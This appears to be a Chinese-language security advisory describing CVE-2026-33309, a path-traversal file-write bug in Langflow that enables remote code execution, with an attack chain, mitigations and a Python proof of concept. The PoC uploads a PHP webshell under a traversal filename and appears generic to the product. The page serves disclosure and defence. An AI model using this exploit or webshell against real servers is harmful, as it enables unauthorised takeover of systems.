CVE-2026-33309 CVSS 9.9 严重

CVE-2026-33309 Langflow任意文件写入致RCE漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33309

漏洞类型

远程代码执行

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Langflow

漏洞概述

Langflow在1.2.0至1.8.1版本中存在严重安全漏洞，该漏洞是对CVE-2025-68478补丁的绕过。由于底层的`LocalStorageService`缺乏边界检查，且仅依赖HTTP层验证，导致防御失效。认证攻击者可利用`POST /api/v2/files/`接口绕过文件名限制，在系统任意位置写入恶意文件，从而导致远程代码执行。

技术细节

该漏洞的核心在于Langflow未能彻底修复`LocalStorageService`中的架构性缺陷。尽管系统引入了`ValidatedFileName`依赖并在HTTP层进行校验，但底层存储层未实施相应的边界包含检查，构成了防御深度的失效。攻击者利用`POST /api/v2/files/`端点进行文件上传时，可以通过构造包含路径遍历序列（如`../`）或绝对路径的文件名，绕过路径参数守卫。由于系统直接将用户控制的文件名传递给存储层，攻击者能够将任意内容写入服务器的任意目录。结合Web应用的运行环境，攻击者通常通过写入Webshell、覆盖启动脚本或配置文件来获取服务器权限，实现远程代码执行。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别出目标网络上运行着Langflow服务，版本在1.2.0至1.8.1之间。

STEP 2

步骤2：获取凭证

攻击者通过注册或社会工程学获取一个低权限账户，满足PR:L的要求。

STEP 3

步骤3：发送特制请求

攻击者向`/api/v2/files/`端点发送POST请求，在multipart文件上传时使用包含路径遍历（如`../`）的文件名，绕过HTTP层验证。

STEP 4

步骤4：写入恶意文件

由于底层缺乏边界检查，系统将恶意文件写入到Web根目录或其他可执行目录。

STEP 5

步骤5：执行代码

攻击者访问写入的恶意文件，在服务器端执行任意系统命令，获取服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
url = "http://target-host:3000/api/v2/files/"

# Attacker's authentication token (Low privilege required)
headers = {
    "Authorization": "Bearer <LOW_PRIVILEGE_TOKEN>"
}

# Malicious payload to write a webshell or backdoor
# The filename contains path traversal to bypass validation
payload_content = "<?php system($_GET['cmd']); ?>"

# The filename attempts to write outside the intended directory
files = {
    "file": ("../../var/www/html/shell.php", payload_content, "application/octet-stream")
}

try:
    response = requests.post(url, headers=headers, files=files)
    if response.status_code == 200:
        print("[+] Exploit successful! File written.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Langflow 1.2.0 - 1.8.1

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用文件上传功能或仅允许受信任的IP地址访问相关API。同时，应加强对服务器文件系统的监控，审计异常的文件创建和修改行为，特别是针对Web根目录和系统配置目录的写入操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表